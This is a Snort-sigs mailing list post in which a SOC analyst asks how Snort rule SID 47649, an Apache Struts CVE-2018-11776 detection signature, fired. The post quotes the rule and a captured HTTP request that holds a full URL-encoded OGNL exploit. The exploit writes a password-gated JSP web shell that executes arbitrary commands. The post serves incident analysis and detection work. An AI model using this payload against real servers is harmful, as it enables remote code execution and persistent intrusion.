Snort mailing list archives
Understanding SNORT ID 47649
From: Migell Roberts <migell.roberts () gdt com>
Date: Mon, 1 Apr 2019 17:52:19 +0000
I've been looking in the snort manual for an explanation on SID 47649 below and unfortunately, I can't find what I need: alert tcp $EXTERNAL_NET any -> $HOME_NET $HTTP_PORTS ( msg:"SERVER-WEBAPP Apache Struts remote code execution attempt"; flow:to_server; content:"|23|_memberAccess"; fast_pattern:only; http_uri:; content:"ognl."; http_uri:; pcre:"/ognl\x2e(OgnlContext|ClassResolver|TypeConverter|MemberAccess)/Ui"; metadata:policy balanced-ips drop, policy max-detect-ips drop, policy security-ips drop, service http; reference:cve,2018-11776; reference:url,cwiki.apache.org/confluence/display/WW/S2-057; classtype:attempted-user; sid:47649; rev:1; gid:1; ) We have Cisco Firepower and the above SID triggered. I'd like to know, how the above SID triggered (I have some assumptions, but didn't want to assume). To paint more of a picture, below are the text captured from packet captures related to the event I found: °ªw0$¬ôcuÚE³@ÿÒ [g [>F®`PÚµlG¥(ð¶ZÏú ×w%á×w ut.print%28%22%3C%2fpre%3E%22%29%3B%0A%20%20%20%20%7D%0A%25%3E HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer: http://www.pba.com/ User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html£© Client-IP: 10.10.10.1 Cookie: akaas_PBAdotComAudienceSegmentation=2147483647~rv=26~id=396fe2c7446d729001164ba005e14de4~rn= True-Client-IP: 120.7.79.15 X-Akamai-CONFIG-LOG-DETAIL: true TE: chunked;q=1.0 Connection: TE Accept-Encoding: gzip Akamai-Origin-Hop: 2 Via: 1.1 v1-akamaitech.net(ghost) (AkamaiGHost), 1.1 akamai.net(ghost) (AkamaiGHost) X-Forwarded-For: 10.10.10.1, 120.7.79.15, 150.142.22.3 Host: www.pba.com Cache-Control: max-age=86400 Connection: keep-alive AND °ªw0$¬ôcuÚE²@ÿV [g [>F®`PÚµfï¥(ð¶ZÏ÷ù ×w%á×w GET /struts2-showcase/filedownload/index.action?method:%23_memberAccess%[url=mailto:3d@ognl.OgnlContext]3d@ognl.OgnlContext[/url]@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew%20java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=gif89a%3C%25%0A%20%20%20%20if%28%22024%22.equals%28request.getParameter%28%22pwd%22%29%29%29%7B%0A%20%20%20%20%20%20%20%20java.io.InputStream%20in%20%3D%20Runtime.getRuntime%28%29.exec%28request.getParameter%28%22l%22%29%29.getInputStream%28%29%3B%0A%20%20%20%20%20%20%20%20int%20a%20%3D%20-1%3B%0A%20%20%20%20%20%20%20%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%0A%20%20%20%20%20%20%20%20out.print%28%22%3Cpre%3E%22%29%3B%0A%20%20%20%20%20%20%20%20while%28%28a%3Din.read%28b%29%29%21%3D-1%29%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20out.println%28new%20String%28b%29%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20o Regards, Migell E. Roberts | SOC Analyst [cid:image002.png@01D03569.BF39F870] 214.873.9250 office migell.roberts () gdt com<mailto:migell.roberts () gdt com> gdt.com<https://www.gdt.com/> | 999 Metromedia Place, Dallas, TX 75247
_______________________________________________ Snort-sigs mailing list Snort-sigs () lists snort org https://lists.snort.org/mailman/listinfo/snort-sigs Please visit http://blog.snort.org for the latest news about Snort! Please follow these rules: https://snort.org/faq/what-is-the-mailing-list-etiquette Visit the Snort.org to subscribe to the official Snort ruleset, make sure to stay up to date to catch the most <a href=" https://snort.org/downloads/#rule-downloads">emerging threats</a>!
Current thread:
- Understanding SNORT ID 47649 Migell Roberts (Apr 03)
- Re: Understanding SNORT ID 47649 wkitty42--- via Snort-sigs (Apr 03)
- Re: Understanding SNORT ID 47649 Alex McDonnell (Apr 03)
- Re: Understanding SNORT ID 47649 wkitty42--- via Snort-sigs (Apr 03)